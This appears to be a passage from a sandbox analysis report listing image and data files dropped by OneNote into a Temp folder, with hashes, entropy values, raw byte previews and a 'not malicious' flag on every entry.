Malicious:	false
Preview:	......JFIF.....H.H.....7Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:12:29.............................V.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................}.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....H.yM..? .Z.. .^.x..p.8.A...K.... .\{..)..y....t..=.^y)..v.@.W>. .h.. ..p.:.\)(.$....$.I).....!....E..Z.....&.5.).

C:\Users\user\AppData\Local\Temp\{904376E8-0B24-4BAA-A56B-E04B895FC890}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 39 x 579, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	515
Entropy (8bit):	6.740133870626016
Encrypted:	false
SSDEEP:	12:6v/7su2/c30mqkg9VgFHe7Ll8UmJX/N+1Zmkk8f3lbtI4:4mc38gFHe18lkk8f3lbth
MD5:	E96BE30D892A5412CF262FEE652921CA
SHA1:	8190A0BFE21D04BC6F3A406E91B87CA69C03A2DE
SHA-256:	0E31DA4DFCFF4A36C64C1CE940362D2309769F36369E4C43C317D5F2FA15658E
SHA-512:	D647F51ABBD013226A6ADD0D551D058C633F867F9AF5A9E099B85D6E291D220F7B85958B07381CD4C7C4F72356DBAFE2A86932AE398E28C56CDDF0744E92EE24
Malicious:	false
Preview:	.PNG........IHDR...'...C........b...`PLTE..................................................................................................bKGD....H....cmPPJCmp0712....H.s....9IDATx^..I..@.C..<..?mo.#C((.J}...~..B...b.I.i.\<.e.....(p.I.EO...q.x.......dRz....K..b0.:.<c.o..0.x\:...F....I&..ap....."P@....DO...q)p*..@Y.CL2)=......1.........4....._.G..^`..lDO...q...X....SL..z....K..#.L#..I6..ap.Ls.,....7&..ap.p..lI...,GO...q.....k.n1..4......3=.f.x.$..4.....o....x.$+..0.x\.,&6...............IEND.B`.

C:\Users\user\AppData\Local\Temp\{93BA39AC-C354-446F-BCF0-1FFF8F16F612}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 556, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	977
Entropy (8bit):	7.231269197132181
Encrypted:	false
SSDEEP:	12:6v/7QiFJaY/z+obuqFA4fypjQSbtBK+lcqNGSbb7XTJArRRzN5DjNRkPmu5cCbR2:x0QY7xbjy9pY0JPXLTWroeuCCbX0
MD5:	B7F74C18002A81A578A4EE60C407A8D3
SHA1:	70A7D4BB1B3ADF4397D168AD0D81B286F88EBDE0
SHA-256:	95F59A0433050180D4C0E8858B83363D51BEA6752A8B7CA516A8677854D8F5B6
SHA-512:	13186A7CDCE80BCA9D2238666D6D7A989FA1887EABFA5D8A9A63EEC304DFD4BE8EFF652205FA56E1D1CEE7D3680AF8C70A952AF73AB3C246400E8D4EBECBDBA9
Malicious:	false
Preview:	.PNG........IHDR...2...,........A....PLTE...................................................................................................................................................................................$.y.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^...0.D_.......cck.....%a...X.a0Y...-..!.G...[....(.r.H.$...1 .zq.4V.e\|a.6.X..4..kl.%....=w....6..TN.....{.4..T/.z...../.....3..!~..t.#b..^.....E!.SFb ...-.....^...,..C.!.b...i._c...s.X.w.. lsQH..H.gKc@@...i. ....m...;Ci....@G.; V{..lO..\.R9e$..{.....P...E.+.2.0D.B,..P...56.?......K.6..TN....^z.4..T/.z...../.....3..!~..t.]b........E!.SFb ...-.....^...,..C.!.b...i._c..Y.O...?.9k2.M.?5 .n.P...,...d._..%M?....6....,.1..R.4.a.R.+..U.Q..P...vd..T........j .]@....."..lJ../.90.4...Y. ...9.%...{......Hc%.....i..%M?aG..H....o.q.......4.......X.d9.r..CI.O.5.Ri0?.s\b....w...>/k..4V.)Y....P...vd..T........j .]@....."..lJ../.90..2..MP..l..?....K.X.....IEND.B`.

C:\Users\user\AppData\Local\Temp\{95BD3EE4-F44A-47CE-84DD-AFD0B35255C1}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3
Category:	dropped
Size (bytes):	2266
Entropy (8bit):	5.563021222358941
Encrypted:	false
SSDEEP:	24:TuRCTP9rSTfIEe1HbcVY1YbDXq8eCI0bf2QQe0GVDQAzZw:aRCTN7HbcW1YbDXq+I07Ien0AVw
MD5:	DB8A181E3F0EAD4A9472099E42ED6BE3
SHA1:	92096AF05CC6167B1AA816811A1160B809393FA2
SHA-256:	E9746B4E9AE9CE7B3B0068779DB3E113E2DFC9880F25373D745D0E700E69A906
SHA-512:	A9E246E10E28D057090BA9F034ECE6131780D7F794C5C9421523388997C7EDFBB49BC32B863B6C6668911B359C304AA54969B48CB9234950D5CECD2A6F3EFFF8
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666......r...........................................5.......................!1AQ..2a...."Rq..#3BSr..C..................................................................?...X.....U...j...F.W.V]'KV.uWt.iT...{.......`.(.....V%..=.....z......V..ct+.U.B...@.............................................{.....5.........0...x4....c..;...........+......\|.7E.%.9.1+}..d.........+.V#.P.HUL.E...g.li...8.>U.";0pi.]5.\..zo..."@.........................................y.6.mLN..S.....@...i..A..p.......~\|V9.+.Xy.........+,L.....7Z7..p...-X...\.....:-...i....v.1...-..H....9.zk....l....^.......:.."^.t.Q.F...X..B..$............................................a.%f&3..1.5+.X..'b7bwr.).e.x....!...H...aa_..kD...b..g..p..K^.k..qX.[,.........Q...U..x...YMvj...w..:k.....j.W.8..4....c.u.}m.....o.=@.......j.S.t.\|.....5h.y.%.~...G

C:\Users\user\AppData\Local\Temp\{9A4C8706-CAFA-4A10-9B8B-8F257E83A5A8}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.643581792552563
Encrypted:	false
SSDEEP:	6:RagcTYyfB3h1RRXUnfVm5ZsG/9FFBl/FKDKTAmTsBRujlw//0lweI/UOwTsjRujd:RaJTYyf9/Ufa/9FFBtO0A4s2Wf/JWsq
MD5:	0A29EFE1CC3814D1A9A300AEB5CEF9B9
SHA1:	6167597EB5D52BDCC3F06FE2A9FEE71EF74DFD0B
SHA-256:	E936784D11C12321360D594CCAE08A36E0B4CE2D8FCB319B1DCA6BF21CB62324
SHA-512:	FC6D0C7E3A4B780876191A321F8DCDFB098D6534870496FA27F25FD959F9AC932D8AB74527FE1D0151EFDD683E4EA44A644FF75C280FDF47C997F256780167C4
Malicious:	false
Preview:	./.C..vL....W"v_K"\...G..%...................?.....I...............................................................................................................h.................................................lA...vP'..........J.]H.#6N.b@.?F..............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{9AAE0628-5C69-4E63-ACEF-E3367519506A}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	55804
Entropy (8bit):	7.433623355028275
Encrypted:	false
SSDEEP:	1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
MD5:	4126992F65FE53D3E3E78F6B27FD49DC
SHA1:	BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
SHA-256:	3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
SHA-512:	624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[.....t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

C:\Users\user\AppData\Local\Temp\{9ABA93A9-1B57-413A-8970-3181C7AC7C1F}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	59707
Entropy (8bit):	7.858445368171059
Encrypted:	false
SSDEEP:	1536:k76rvGc8WKC2/UX1uEgVRY/jvv9CblyL/T:k77Z5C2/Ow1e9CblCT
MD5:	47ADB0DF6FDA756920225A099B722322
SHA1:	851946B8C2BD0BB351BAEECA9E5BB6648A87D7CA
SHA-256:	EC8CD7250F3D82E900E99114869777EE859EC73EFFABED108815F65742078C3A
SHA-512:	85A9920E1CE4A2FCCEBAFA425C925DF33580FA3C3C00178F058539B2FBC0163866DB8A41B320E2EF2CD217F00FFA06A1A831C728D3F9F910C9EAC58B5DA76E2D
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..A..Qaq"....2........B#..R.b3$..8xrC4&'W.%e.(.c.d.5E6Ff..h..SsTt..u...Gg..H.....................!.1..AQ.aq.".......2..st.BR..56.r#3.b.S.4c%...$d.CT............?....3.7...G:../P....z..K.:6..w......6....... .z7...~.....{gdF60...9....{...'[N....m.........z...g{.......7...4..1..=.z...._..p...m..Icd.~.v..9.P..0Z(.<j.......R6zm.....v.z...>x..)=g........zo{..w..f..y.t.....%.D..#.}.I.>).H.QM..cLD..x.../.^y.{.............y.=^.......I.T.......U..0_?...u..og..3.ky..K....6w...Dc......~........ik.z....N...en......_.....x....._u...4.{..P...>.....}.......>.R.....m.....[mt.....}.........\|.....m......~....B.F.]C.36..q....yg...{]...+.DZv.9<.o..;..N.n&im.,....w.3...V.s...Y..e#$.

C:\Users\user\AppData\Local\Temp\{9BAFE8E6-FE02-422B-9FEB-2E0476802FD6}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40884
Entropy (8bit):	7.545929039957292
Encrypted:	false
SSDEEP:	768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
MD5:	7379775A1E2AB7FAB95CFFCE01AE05F3
SHA1:	3D3DDFD8AC7E07203561BAE423D66F0806833AB3
SHA-256:	9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
SHA-512:	4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

C:\Users\user\AppData\Local\Temp\{9C0E3EDC-F67C-48B8-9CC4-4DD89EB7FB0E}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3
Category:	dropped
Size (bytes):	12654
Entropy (8bit):	7.745439197485533
Encrypted:	false
SSDEEP:	384:JheN2cq6MLu6MLGu54cHeNzhcmhcDu53eNE3UPkhrxvu:Ji2Wix7fzVsbE3Zm
MD5:	4BCCCDBB4273ECEBE216C84930A8D0B2
SHA1:	FFBF617787E27BC94D9BAF89F2FE34A2BD42794B
SHA-256:	474F9A8C25D5E21192315397EA995B1E11E2C1608157C6E0277688091BFD136A
SHA-512:	DAD73A8C0E293B88685C0C71EF15E0DC95EE39B7FC9F849DE5D634173FD9FA0AF0AA96742D9E94BE03556AA4A817D5001C95A6736EAD5D5DF03661876785EB74
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................i..............................................E.....................U....V...f..ASTc.......de.1Qq...!Rb....Ca."r.................................B....................b....Ra.....!Qc.....AS.1U.."C...2Bq...$#3%&.............?......3.....~......:..g..s"......:..g..s"..ic..Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. ..0...Q_..X..V5E~..c..X...@u...cTW...0...Q_..;.m.....@w...Q.+.....4W...lUFh....v..._..wn...dW....y._..v..E~......@wn...dW....y._...v..U..@wn...d..{`;.\|U.2g....3...:.0?ViN.z.@w...4.M.:m..`~..i7...q...I....J.`l...W..n..PQTiB...6....+..sj.."...6....+..WA...x..A........(.N6`..AD.q.....'S...t.Q:.l.......f.]..N..0.. .u8..A........_W..Y...}.C...~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~.v..?U..^.r..}..Bep

C:\Users\user\AppData\Local\Temp\{9DAE3C16-8870-474D-949F-F29DFCE47C8C}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 77 x 627, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	5136
Entropy (8bit):	7.622045262603241
Encrypted:	false
SSDEEP:	96:djzuNKb3XHco17p2wolIxIx7lpskdsC/ddWNKeabJbMojpxLDTu1:VzuNKb397pwlIxKp7qs3bJb5FBTw
MD5:	FA38AFA965141EA3F17863EE8DCCDE61
SHA1:	2B4611E651AF7549C1AA73932B1136B561A7602F
SHA-256:	E1CB1A0EC9BE62D5445C73AA84DF38234002A7E164EE830C9DF24997802CB5D2
SHA-512:	A372674F5CA343321BA9C413D346070709F7685706C9C6C3DC7F61846B59253A5E6FE800DBA10AE870FD3887439B2AA106FBBB51751E92A163938A4393C43E28
Malicious:	false
Preview:	.PNG........IHDR...M...s.....}8nv....PLTE.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................z`.....tRNS...................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{9DB9AA5F-D7E0-4774-B63D-4A63ADCFD69C}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3
Category:	dropped
Size (bytes):	5465
Entropy (8bit):	7.79401348966645
Encrypted:	false
SSDEEP:	96:X0cZneDWlIKmXwxacOHHI6EhzNlSSDDgafbofgt7mGrw:XleDWlIJwQHihRdgu8imGk
MD5:	8470F9A96B6C6CAD9EE60961E96D19B2
SHA1:	AFE1F01FFA4E4CB06B1D770C9C59DA75B434D1AC
SHA-256:	2DF453410796AEC7B9EFEC00059B6CE64BCF67313A95AE458BA600EA5DE14811
SHA-512:	CAE5C2ED091BA49761F0348516D53491E578FB165F32F93AC7DAD927383E9A398B06229FAC6A8233777DF708E5001AE0037A1FA960293BDA49892C40B37F2240
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................E.e.............................................8...............................!"1...2A#Qa.$34bBDSqt..........................................................?.....`0.....O...3Sd..@..5.0....Q.pw....;....!pN.DR....`0......N^...k.=.u.e.7{.b........?z....zV...M.....P:a.SPj.....WRK.=x.2.h..2..AS..s..A..\|.Z/f$D.YX1pr......}G6._.~..)j...+.s.r".{..q..-.^@...#w\|.H...K)....g...y..`0......2.w@.Ro.d....@...K....}...&... y..f.y.0.\|DC..>p.[E.2......v..N.)Z..4.RF.D.8]..Z.\|f/..+\ID.r/.o........0i...G.O..uj..RN. ....j...xnF...Q.Ls.U.c.D0m....z.k.P;f...b.=..L.hH.,./;.U..`sa.I...?...I....M.0<.u....!..C..U.T.....s.Q......_..7K.......?....R\&=.<.u..oQ}WZ..Yu...{Fe3.h...@.s..mW.G..^....1.W.#[.q2.&u.c.G......`J./..X.C....M;.....3k$}.i.3...#/x.m.Oh.}FH]. ..5NNDIS.-.M~...6..w.d....P.;..k...........v*..T..L.P...s.!B.4..w

C:\Users\user\AppData\Local\Temp\{9F93690B-59A6-44ED-94D5-763AB6DDF165}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	60924
Entropy (8bit):	7.758472758205366
Encrypted:	false
SSDEEP:	1536:kU7O7+CFqO6DkxTgPzo2wqggrrX8QvN1I/ZLBttB9+dPFXbc:hVuqJDaTqo2wq1L84N1I/Z1tT9X
MD5:	D58C51D2CF586A5E14A9EC8529C3B0A8
SHA1:	F4811A353797C29B1E3F5A61B125C46E1534D587
SHA-256:	F927C7825851974A2149868146970706523A49165133CEE6027A43E8C9ABDF27
SHA-512:	34B963173AFBDF07432F4B983D29F10376E4771FE666E9D50B1A81DA0B9F6001FD86B4A08B9711386DE153BF6E03C8E932E2D181C8EAF94EFF34D20FCA7570E0
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d................................................................................................!1AQ.aq....".....2B...Rbr#.s.4...3$.5u.6v..CSc...DT..f..t..&F........................!1..A.Qaq....."2....B.s....Rbr..#4...35...CSc.$...DTdt..%..............?....O<......X.O.Fg..{.W&u.u.T~.\|r;g!.._X..N.p.4.........................................................yK..xd...6..\|%....\j..e.=...Y..f..I.\|-....e...$R.j.......~.W#....{.....V.k.\|F..z^..:.~..f......"x.....L..K..r../.;..[..l...;.U...W...X.........8.....y?..B...m.......j..Q.g3..G.K....GL.o..n7a..Y..[.'.........x........\......~...f...0\Wc.n?k.\|.....1.ww;..2..?...r4uF.MXdB6..W..mG2NJ.E........u...2.q...Z..=(l)jU.X...U.\X.......O<......X.O.Fg..{.W&u.u.T~.\|r;g!.._X..N.p.4.......................................................

C:\Users\user\AppData\Local\Temp\{A12D6A2F-B10D-4059-8326-3A43C273D855}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Temp\{A4BA9D0D-43CE-4486-B065-4E0B23506F43}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6536712706012495
Encrypted:	false
SSDEEP:	12:RaixDbYyf9/UfsQGfFFBtheBVt2Wf/tTtq:Yi1bYyfSBGVtheBVM0U
MD5:	E7F787ECA0B061433D6BC02A49A33253
SHA1:	9AB3756CDE5A1E92738AAF058506A9925A836010
SHA-256:	7495EA54E83FD4B93800152850CF6B9419EAD2D892839ADBAE44C18A1B55E67A
SHA-512:	26F91D4451ED836C912646E28700083ADA3C8C7DE2DEFF3972F543D07A07A39E7BA64092ADE846B4073DDE275C38E33E7F7B1D6743C854E766C03C4B557399A3
Malicious:	false
Preview:	./.C..vL....W"v_..i0..qL..g..b................?.....I...............................................................................................................h............................................S...s)@....U.tT..........fBO..D......U.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{A6536237-145B-4C63-8ADF-895CBDB36188}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12180
Entropy (8bit):	5.318266117301791
Encrypted:	false
SSDEEP:	96:k1bHyG/fKOOOOQJUg+g2S+kEm6alfsfsfn32:+bSG/yOOOOQ+g+gOab32
MD5:	5C859FF69B3A271A9AAB08DFA21E8894
SHA1:	3156302A7450ADFF4D1B6EC893E955D3764D4DD4
SHA-256:	B4A8E9A67EE0B897615AC4CCE388FFC175AB92D9E192E6875C79A4E7C1B5BB6E
SHA-512:	4CF518136EEBCA4F400A115D9B7BB0CAC9FA650BF910B99E15F04A259B7D3EFCFFD6796886FE09DB08C37C332B14BC8500845C09C8EAE1F2306F90E98D3C99E0
Malicious:	false
Preview:	.PNG........IHDR..............;j.....sRGB.........pHYs..........+..../9IDATx^...dW...S=.dL$.............-.`...'...x.7.D...(...$.?cO....9S]=.v...Z.......{..wNuf.&.....a.k5~...._..\.yk..v.....}{._.Q...5...._9o.n.....}7.].1v..t......q....3.<..0<.p.......0....s...... @....... @....... @....... @....... @...X.'..U-..... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%@....... @....... @....... @....... @....... @....../)m.. @....... @....... @....... @....... @....... @ ....`.)....... @....... @....... @....... @....... @....K.0.....J....... @....... @....... @....... @....... @...`.....\.... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%

C:\Users\user\AppData\Local\Temp\{AC311F2C-93C2-414E-843C-C2B372637087}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40035
Entropy (8bit):	7.360144465307449
Encrypted:	false
SSDEEP:	768:MQhziQo1RKGlyyzYjlxuxwRUj/BN837xRmwH2uDTCn8qXFQziN:ThzrSzalg6O563l4uTC8q1Ig
MD5:	B1DDD365D87605F96D72042CB56572F6
SHA1:	ADF71DAD1A62B8A58A657C2EDBDD665A19EB846B
SHA-256:	06E09DE80C3F32254DA4FE6B2CBAD7C05EF144DD54B8C65745E195BBF7317A2E
SHA-512:	9C686092CC9524F34EA6CEC9AAE936A6225BCC54DE38DE1786EBA8F532959A80FF885E8664A09E4C318D7CA4B278E807D3D1F135BE55F30979B844FF5EC9699A
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!1....AQ.aq.....".3.5...2B#s.$%..Rr.CS4&6...bE'7.c.DTtU...d.eu...VFfv.Gw.....Wg......................!...1AQaq........"2..4..Rbr#3$...B.s5Cc.S%.D............?..^.f....R.N{.{f.....O.r.V.;U..~...U.(..>M._.yI.{8,..^.t...s`...j.O..U5t.&&..h.G.6Da.;.....J.......E..QD...C...}..N...tR.....~..].J:.V$..r......]...W......4.[.)6..Y_.....4...........m._'HR.a......]U=.....n...0.W..]..K..){.+...w...f...<\|..1/.\|.....b..-..y....]U#Ctn.7m.._.\|..2I;\|....tM....q.q.}.N)....'...9&...nR...R..}.........m._.LZ}u.../K....9.~..?.{....V.#..dx.Zk.:=..:.j].....E#....E~w%....J..[S..[......gr...vb.r]..<..ut..i...[P.w....:..Gkn>......#..m...9km`......t).up.....w....VOR.{&.nQI..}...wD.7Ey#n....MO.

C:\Users\user\AppData\Local\Temp\{AC4A94B6-ABA5-4A65-9430-DB427CC56BD4}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6498123948663304
Encrypted:	false
SSDEEP:	12:RarLYyf9/Ufall/gQIGyFFBth4HlE4Hl+Wf/C94HlS:YvYyfSCltjktuFRF+uFS
MD5:	DBF7CA14C3FF618420C946E3EE4ED210
SHA1:	28DFEB7BB66EFF7AC672277D9EBDEB10C6A2022F
SHA-256:	3E3FC6561B001CF12A2D1AA2BC8B9A8EC94E091ED4770C4C041A5F9B70DF6A83
SHA-512:	9BFCB66F54E8A7950A514049FFED83815C648B4D0A48FC766078F1C9C94336B18BE29FA2ACF96728E0C06B15AA4B47E9821D7BC5110E3D4531614C93A9CC6BE1
Malicious:	false
Preview:	./.C..vL....W"v_..U..gJD...u....................?.....I...............................................................................................................h..............................................).\.H.N.P...t........A$.=..\A.?K0................................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{B1DC8E43-2F93-46C6-90E6-6590A044DA7E}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Temp\{B67FCE44-31CB-4289-8F97-0FFAABD58DD4}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6495715636974709
Encrypted:	false
SSDEEP:	6:RaU4IT//ltYyfB3h1RRXUnf0o7LQFFBl/FKZOfZwkOfZbRujlw//0lweI/C6OfZs:RaU4ITXltYyf9/Uf0o4FFBt2ELWf/C6P
MD5:	F031EB844CE692D416FB1CAEF5F51A97
